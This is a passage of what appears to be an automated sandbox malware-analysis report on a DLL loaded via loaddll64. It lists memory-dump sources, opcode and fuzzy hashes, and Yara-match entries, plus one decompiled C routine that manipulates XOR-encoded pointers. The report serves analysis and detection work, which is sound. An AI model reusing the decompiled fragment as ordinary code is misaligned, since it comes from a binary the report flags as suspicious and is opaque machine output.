                                                                                                      • Opcode Fuzzy Hash: d636a00b42bd7fb21fd81f09ca247f2baf2d4d4e689b7af4b01eea6171bd139b
                                                                                                      • Instruction Fuzzy Hash: 81B09221E27A02C2EB482B21ACC231422A4BF49744F880039C50C42330DF3CA0FA5720
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 242dba147a3b42ea0af5cfec930ece5e83433d0fba20fb6d2f2fe3008541b1f6
                                                                                                      • Instruction ID: acc53311729b3702271ddd4d27c6e114e7717bdbebfd3a0864e34ca081a3005a
                                                                                                      • Opcode Fuzzy Hash: 242dba147a3b42ea0af5cfec930ece5e83433d0fba20fb6d2f2fe3008541b1f6
                                                                                                      • Instruction Fuzzy Hash: C691197090470CAFDB98DF68C04669DBBF2FB48344F40C1ADE849AB690D7759A19CB85
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f4ff37af258a23db5c01797c23f2434de8658ec910b62f667d3e0b084e4f6255
                                                                                                      • Instruction ID: ee1a5b038e23b1b762728b601e6c99c8254ef48870683394c78a05e9b81e4730
                                                                                                      • Opcode Fuzzy Hash: f4ff37af258a23db5c01797c23f2434de8658ec910b62f667d3e0b084e4f6255
                                                                                                      • Instruction Fuzzy Hash: 9A61457160460C8BDB6CDF38D4866A93BE5FB58740F24613DF866C72A2DB74D906CB44
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 411371247076829a3ed050940fe1e65d63f7276580b25cd8f2de86b758f4f241
                                                                                                      • Instruction ID: 124210ae31362696c8e7c7fc55ee17b9d1fa189669067b7980e05abe0ce7dbb4
                                                                                                      • Opcode Fuzzy Hash: 411371247076829a3ed050940fe1e65d63f7276580b25cd8f2de86b758f4f241
                                                                                                      • Instruction Fuzzy Hash: 9C81CF7190471C8FEB65DFA8C48968DBFF0FB58388F20461EE815A7262DB749945CF81
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9dac85506b1f04058cb15554c85bbceb8ebb7a831f5bd702a5d02e9f92134646
                                                                                                      • Instruction ID: 378d96e7360db12acf5ccb9a2c1092155fc294dfe99add9db15bd0895a73080d
                                                                                                      • Opcode Fuzzy Hash: 9dac85506b1f04058cb15554c85bbceb8ebb7a831f5bd702a5d02e9f92134646
                                                                                                      • Instruction Fuzzy Hash: 74516C71524A8CABDBCDCE28D8C6A993BA0FB15344F90621DFC46C7292CB74D985CB41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a302809728b8e03c07a5101cfacb15d383c3ede7fbfee8270d7ccf682f85e519
                                                                                                      • Instruction ID: 9e927ce13f7a1bb1e2c5c1d7a163d6b5d2e9c657e45868b69d9ea0509db524eb
                                                                                                      • Opcode Fuzzy Hash: a302809728b8e03c07a5101cfacb15d383c3ede7fbfee8270d7ccf682f85e519
                                                                                                      • Instruction Fuzzy Hash: C7411892F75BDA47EF039A7A94137B00A00AFA77C1E41E332ED1B77B51DB1D54968200
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 60%
                                                                                                      			E00007FF87FF87C10A370(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
                                                                                                      				void* _t24;
                                                                                                      				int _t26;
                                                                                                      				signed int _t51;
                                                                                                      				void* _t52;
                                                                                                      				signed long long _t66;
                                                                                                      				signed int* _t73;
                                                                                                      				signed long long _t75;
                                                                                                      				signed long long _t77;
                                                                                                      				signed long long _t78;
                                                                                                      				signed long long _t95;
                                                                                                      				signed long long _t96;
                                                                                                      				signed long long _t98;
                                                                                                      				signed long long _t104;
                                                                                                      				long long _t115;
                                                                                                      				void* _t117;
                                                                                                      				void* _t120;
                                                                                                      				signed long long* _t123;
                                                                                                      				signed long long _t124;
                                                                                                      				signed long long _t126;
                                                                                                      				signed long long _t129;
                                                                                                      				signed long long*** _t132;
                                                                                                      
                                                                                                      				_t52 = __edi;
                                                                                                      				_t51 = __edx;
                                                                                                      				 *((long long*)(_t117 + 0x10)) = __rbx;
                                                                                                      				 *((long long*)(_t117 + 0x18)) = _t115;
                                                                                                      				 *((long long*)(_t117 + 0x20)) = __rsi;
                                                                                                      				_t66 =  *((intOrPtr*)(__rcx));
                                                                                                      				_t132 = __rcx;
                                                                                                      				_t73 =  *_t66;
                                                                                                      				if (_t73 == 0) goto 0x7c10a504;
                                                                                                      				_t124 =  *0x7c17e008; // 0xb442f0549439
                                                                                                      				_t111 =  *_t73 ^ _t124;
                                                                                                      				asm("dec eax");
                                                                                                      				_t75 = _t73[4] ^ _t124;
                                                                                                      				asm("dec ecx");
                                                                                                      				asm("dec eax");
                                                                                                      				if ((_t73[2] ^ _t124) != _t75) goto 0x7c10a476;
                                                                                                      				_t77 = _t75 - ( *_t73 ^ _t124) >> 3;
                                                                                                      				_t101 =  >  ? _t66 : _t77;
                                                                                                      				_t6 = _t115 + 0x20; // 0x20
                                                                                                      				_t102 = ( >  ? _t66 : _t77) + _t77;
                                                                                                      				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t77) + _t77;
                                                                                                      				if (( ==  ? _t66 : ( >  ? _t66 : _t77) + _t77) - _t77 < 0) goto 0x7c10a412;
                                                                                                      				_t7 = _t115 + 8; // 0x8
                                                                                                      				r8d = _t7;
                                                                                                      				E00007FF87FF87C10D858(_t6, r10d & 0x0000003f, __esp, _t77, _t111,  ==  ? _t66 : ( >  ? _t66 : _t77) + _t77, _t111, _t115, _t120);
                                                                                                      				_t24 = E00007FF87FF87C10A9DC(_t66, _t111);
                                                                                                      				if (_t66 != 0) goto 0x7c10a43a;
                                                                                                      				_t104 = _t77 + 4;
                                                                                                      				r8d = 8;
                                                                                                      				E00007FF87FF87C10D858(_t24, 0, __esp, _t77, _t111, _t104, _t111, _t115, _t120);
                                                                                                      				_t129 = _t66;
                                                                                                      				_t26 = E00007FF87FF87C10A9DC(_t66, _t111);
                                                                                                      				if (_t129 == 0) goto 0x7c10a504;
                                                                                                      				_t123 = _t129 + _t77 * 8;
                                                                                                      				_t78 = _t129 + _t104 * 8;
                                                                                                      				_t88 =  >  ? _t115 : _t78 - _t123 + 7 >> 3;
                                                                                                      				_t64 =  >  ? _t115 : _t78 - _t123 + 7 >> 3;
                                                                                                      				if (( >  ? _t115 : _t78 - _t123 + 7 >> 3) == 0) goto 0x7c10a476;
                                                                                                      				memset(_t52, _t26, 0 << 0);
                                                                                                      				_t126 =  *0x7c17e008; // 0xb442f0549439
                                                                                                      				r8d = 0x40;
                                                                                                      				_t14 =  &(_t123[1]); // 0x7ff87c101024
                                                                                                      				asm("dec eax");
                                                                                                      				 *_t123 =  *(_t132[1]) ^ _t126;
                                                                                                      				_t95 =  *0x7c17e008; // 0xb442f0549439
                                                                                                      				asm("dec eax");
                                                                                                      				 *( *( *_t132)) = _t129 ^ _t95;
                                                                                                      				_t96 =  *0x7c17e008; // 0xb442f0549439
                                                                                                      				asm("dec eax");
                                                                                                      				( *( *_t132))[1] = _t14 ^ _t96;
                                                                                                      				_t98 =  *0x7c17e008; // 0xb442f0549439
                                                                                                      				r8d = r8d - (_t51 & 0x0000003f);
                                                                                                      				asm("dec eax");
                                                                                                      				( *( *_t132))[2] = _t78 ^ _t98;
                                                                                                      				goto 0x7c10a507;
                                                                                                      				return 0xffffffff;
                                                                                                      			}
























                                                                                                      0x7ff87c10a370
                                                                                                      0x7ff87c10a370
                                                                                                      0x7ff87c10a370
                                                                                                      0x7ff87c10a375
                                                                                                      0x7ff87c10a37a
                                                                                                      0x7ff87c10a388
                                                                                                      0x7ff87c10a38d
                                                                                                      0x7ff87c10a390
                                                                                                      0x7ff87c10a396
                                                                                                      0x7ff87c10a39c
                                                                                                      0x7ff87c10a3b4
                                                                                                      0x7ff87c10a3ba
                                                                                                      0x7ff87c10a3bd
                                                                                                      0x7ff87c10a3c0
                                                                                                      0x7ff87c10a3c3
                                                                                                      0x7ff87c10a3c9
                                                                                                      0x7ff87c10a3d7
                                                                                                      0x7ff87c10a3e1
                                                                                                      0x7ff87c10a3e5
                                                                                                      0x7ff87c10a3e8
                                                                                                      0x7ff87c10a3eb
                                                                                                      0x7ff87c10a3f2
                                                                                                      0x7ff87c10a3f4
                                                                                                      0x7ff87c10a3f4
                                                                                                      0x7ff87c10a3fe
                                                                                                      0x7ff87c10a408
                                                                                                      0x7ff87c10a410
                                                                                                      0x7ff87c10a412
                                                                                                      0x7ff87c10a416
                                                                                                      0x7ff87c10a422
                                                                                                      0x7ff87c10a429
                                                                                                      0x7ff87c10a42c
                                                                                                      0x7ff87c10a434
                                                                                                      0x7ff87c10a441
                                                                                                      0x7ff87c10a445
                                                                                                      0x7ff87c10a45d
                                                                                                      0x7ff87c10a461
                                                                                                      0x7ff87c10a464
                                                                                                      0x7ff87c10a46c
                                                                                                      0x7ff87c10a46f
                                                                                                      0x7ff87c10a476
                                                                                                      0x7ff87c10a47c
                                                                                                      0x7ff87c10a495
                                                                                                      0x7ff87c10a49b
                                                                                                      0x7ff87c10a49e
                                                                                                      0x7ff87c10a4b1
                                                                                                      0x7ff87c10a4ba
                                                                                                      0x7ff87c10a4c0
                                                                                                      0x7ff87c10a4d1
                                                                                                      0x7ff87c10a4da
                                                                                                      0x7ff87c10a4de
                                                                                                      0x7ff87c10a4ea
                                                                                                      0x7ff87c10a4f3
                                                                                                      0x7ff87c10a4fe
                                                                                                      0x7ff87c10a502
                                                                                                      0x7ff87c10a51f

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastPrivilegeRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 1334314998-0
                                                                                                      • Opcode ID: ed3b70687e7945458bcaab2cb262aa06014580efde759abfe4f9ab75d549e353
                                                                                                      • Instruction ID: 89fdc7c680e4a1959340e688f2e8373739564fbf3fe0712293e5db78a359df78
                                                                                                      • Opcode Fuzzy Hash: ed3b70687e7945458bcaab2cb262aa06014580efde759abfe4f9ab75d549e353
                                                                                                      • Instruction Fuzzy Hash: C741E223724A9486EF04CF2AD918669B7A1FB49FD4B499036EE5D87B58DE3CD0C68310
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0fd7e54c2e3c2eb2f4057fbf02f2f3a8737c251e610f5f48a5c25456a3c2a7c7
                                                                                                      • Instruction ID: 707c8c7feef62a70d2195b75d5e6b66e4219545dc678810288b7b2209aceacb9
                                                                                                      • Opcode Fuzzy Hash: 0fd7e54c2e3c2eb2f4057fbf02f2f3a8737c251e610f5f48a5c25456a3c2a7c7
                                                                                                      • Instruction Fuzzy Hash: 1161917154878DDBEBBACF24D88A7D97BB0FB48314F904219D84E8E290DB74574ACB41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8a779fa67324b10137dca71439002aac2bbc9acba917943a89a2440558f265d6
                                                                                                      • Instruction ID: 49561eaafaa20b5dbb512bdc2e8c8324cc323e320cbd5a294de7a2bbabfa02a5
                                                                                                      • Opcode Fuzzy Hash: 8a779fa67324b10137dca71439002aac2bbc9acba917943a89a2440558f265d6
                                                                                                      • Instruction Fuzzy Hash: 3351B07051478C8BEBBACF28DC9A7DB3BB1FB48704F50421DA84E8E2A0DB765645CB41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: de15e4835354da21c21c581afa9e1e49ad56d5e721c00a56a2a0f9a367a7b1e2
                                                                                                      • Instruction ID: cab1e4afcb3e4e3efad056c987e19407a7ae96f8ba765043352ee3f473a28ce2
                                                                                                      • Opcode Fuzzy Hash: de15e4835354da21c21c581afa9e1e49ad56d5e721c00a56a2a0f9a367a7b1e2
                                                                                                      • Instruction Fuzzy Hash: 7A51597191474DCBDF6DCF68C88A6DDBBB0FF08344F004219E94662291DB799949CF85
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1891d7c6e5579f1ddf716b9efe699b55b9d074dc8e7dc217c6cd483ac21faf1f
                                                                                                      • Instruction ID: 0d5a1e45f689093ba705f26d6d0b7ee4761fe465e88e59cb2662693f670c6f5b
                                                                                                      • Opcode Fuzzy Hash: 1891d7c6e5579f1ddf716b9efe699b55b9d074dc8e7dc217c6cd483ac21faf1f
                                                                                                      • Instruction Fuzzy Hash: 99517CB590034A8FDB88CF64C58A4DF7FB0BB68398F204619F856962A0D374D6A5CBD1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0947fb190b259f2f036e8e13266f38e419df21044a1d34d71fc6672665701d99
                                                                                                      • Instruction ID: 6b1a579500f7469a5a283cf0a7520b14203c8905753f3a8ac0622774f88945dd
                                                                                                      • Opcode Fuzzy Hash: 0947fb190b259f2f036e8e13266f38e419df21044a1d34d71fc6672665701d99
                                                                                                      • Instruction Fuzzy Hash: 1241D3B050034E8BDB48CF64D88A4DE7FF0FB68398F214619F859A6250D378D6A4CBC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 95e6112c03750f4c0630cdb5a18b98eee8cc7382c4e8c9e1a176535c4f274712
                                                                                                      • Instruction ID: 4275e61531d4984f43622383f8721a212c43d9f9e5acc043d588a3e2cbca8aaf
                                                                                                      • Opcode Fuzzy Hash: 95e6112c03750f4c0630cdb5a18b98eee8cc7382c4e8c9e1a176535c4f274712
                                                                                                      • Instruction Fuzzy Hash: 0741D2B090074E8FDB48CF64C98A5DE7FB1FBA8394F204219EC4AA6250D374D6A4CBC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8348d3cd7f29255d4884c11fe93a9125b21d4f4a43616c69afa397f7f63962af
                                                                                                      • Instruction ID: afd4a856b60e5dc0eb8acee87462e8dc665325ca188dc724d3a88843a6c40c3d
                                                                                                      • Opcode Fuzzy Hash: 8348d3cd7f29255d4884c11fe93a9125b21d4f4a43616c69afa397f7f63962af
                                                                                                      • Instruction Fuzzy Hash: 6041AFB180438E8FDF48CF64C88A5DE7BB0FB58348F104A19E86696264D3B9D664CFD5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6c4ca00263a0247c4b651e916fb7a83a9bfa1ce2ae173780690b90c0a27bb6f5
                                                                                                      • Instruction ID: 224c6f81855e22c7893a2b7f2b7cfff3a5734a3a9938c9b8f57012155b825125
                                                                                                      • Opcode Fuzzy Hash: 6c4ca00263a0247c4b651e916fb7a83a9bfa1ce2ae173780690b90c0a27bb6f5
                                                                                                      • Instruction Fuzzy Hash: 3041B1B090478E8BDF49CF68D84A5DE7BA0FB58348F104A1DEC66A6294D3B4D664CBC4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6f2ddded83ff06c7b56f3b031172a418f339d67288712c2ef59fbdfb7de3fa65
                                                                                                      • Instruction ID: 49a2f425b0a366156263d2a3b3444c35eadce35315b0c57ee30031dbbbdec485
                                                                                                      • Opcode Fuzzy Hash: 6f2ddded83ff06c7b56f3b031172a418f339d67288712c2ef59fbdfb7de3fa65
                                                                                                      • Instruction Fuzzy Hash: FB41E6B090034A8BDF48DF68C88A5DE7FB1FB58358F10461DF85AA6390D37896A5CBC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e9a747ab3829d035c160e30ca67f218d8c010ef4ce6a01bc2123f51e37c39b15
                                                                                                      • Instruction ID: 6daa388222a5a84c7974237e422c02caa7ff578f64bce21c4d2575711bd59858
                                                                                                      • Opcode Fuzzy Hash: e9a747ab3829d035c160e30ca67f218d8c010ef4ce6a01bc2123f51e37c39b15
                                                                                                      • Instruction Fuzzy Hash: EB41D5B190074E8BDF48CF64C48A5DE7FB0FB68358F214618E855A6290D3B8D6A5CFC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d4a31af1c88a1e6ab448c518336f099c9e743a345a8116ccbb9bcacf6df5466d
                                                                                                      • Instruction ID: d8d0a970803080bdb9b0c4b9adcb29ea95a621f075ad5d7819bf759c13dfa2c1
                                                                                                      • Opcode Fuzzy Hash: d4a31af1c88a1e6ab448c518336f099c9e743a345a8116ccbb9bcacf6df5466d
                                                                                                      • Instruction Fuzzy Hash: AE3105B090034A8BDB4CDF68C88A4DE3FA1BB58398F10461DFC5A9A350D3B4D9A4CBC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 69f1bd5eb2f0ebfb53ff7e4ae7896f851b8bbd9ae22bdf3f2cf4232ccd8f10e8
                                                                                                      • Instruction ID: 8f5d51aba00c4f23d52c296157a313ffc4782a84c6f71662d1847f1d9af8e599
                                                                                                      • Opcode Fuzzy Hash: 69f1bd5eb2f0ebfb53ff7e4ae7896f851b8bbd9ae22bdf3f2cf4232ccd8f10e8
                                                                                                      • Instruction Fuzzy Hash: E431ADB55187818BC348DF28C54A51ABBE1FB8C308F504B2EF8CAA6294D778D6058B4A
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a1cb5be32486d082a1004d5cd3269ee3ed63ecfe90488e34a48b9d161af83a4e
                                                                                                      • Instruction ID: 79354f79ef65217a83ad5669e5e5daff520c5b483ab2cf90db9683dfdc12feb2
                                                                                                      • Opcode Fuzzy Hash: a1cb5be32486d082a1004d5cd3269ee3ed63ecfe90488e34a48b9d161af83a4e
                                                                                                      • Instruction Fuzzy Hash: A331C5B190434A8BDB48DF24C88A5DE7FF0FB58388F10461CE85AA7250D3B4D6A4CBC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 403423f91ab6d2efc18bb9c6fca72d8179c469d66eb0a9203399f0508270c383
                                                                                                      • Instruction ID: f7e907a5a4d268517ac5d39fb781b2abcac55db7633d781cedf7f9941ca353e5
                                                                                                      • Opcode Fuzzy Hash: 403423f91ab6d2efc18bb9c6fca72d8179c469d66eb0a9203399f0508270c383
                                                                                                      • Instruction Fuzzy Hash: 8F21A0B152C781AFD388DF28C19981ABBE1FB88304F806A1DF98687350D374D844CB46
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7bd384b18a8f018deb1ae8c02f50e3dfc83e34399570a2e179077375e0c66cc5
                                                                                                      • Instruction ID: e563aa27f56e2ecce816434c0e114442c931e28e35474e2e86562d3eaff730a2
                                                                                                      • Opcode Fuzzy Hash: 7bd384b18a8f018deb1ae8c02f50e3dfc83e34399570a2e179077375e0c66cc5
                                                                                                      • Instruction Fuzzy Hash: 8931707552D784AFC788DF28D48991EBBF0FB98345F906A1DF88686264E374D445CB02
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
